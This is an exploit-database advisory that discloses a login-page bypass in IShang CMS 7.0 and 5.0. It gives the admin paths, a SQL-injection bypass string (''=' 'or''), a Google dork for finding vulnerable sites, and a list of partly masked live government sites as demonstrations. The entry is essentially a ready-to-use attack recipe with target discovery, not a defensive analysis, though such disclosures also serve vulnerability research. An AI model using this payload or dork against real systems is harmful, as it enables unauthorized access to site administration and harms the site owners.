IShang CMS Login Page Bypass Vulnerability

2014.01.01
Credit: Adrian
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

###################### # Exploit Title : IShang CMS Login Page Bypass Vulnerability # Exploit Author : Adrian # Vendor Homepage : http://www.ishang.net/ # Google Dork : intext:"技术支持:安徽商网" # Date: 2013/12/28 # Tested On : Win8 # Software Link : http://www.ishang.net/ # Version : 7.0 / 5.0 ###################### #* # 1) http://site.com/[path]/admin/ # 2) http://site.com/[path]/mywebs/ # # String For Bypass : '=' 'or' # # Demo: # http://www.Xl.gov.cn/admin/ # http://www.laXXjXj.gov.cn/admin/ # http://fX.XXX.gov.cn/admin/ # http://gXS.aX.gov.cn/admin/ # http://sangXov.cn/admin/ # http://www.mXXyj.gov.cn/admin/ # ###################### # discovered by : Adrian ######################**


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top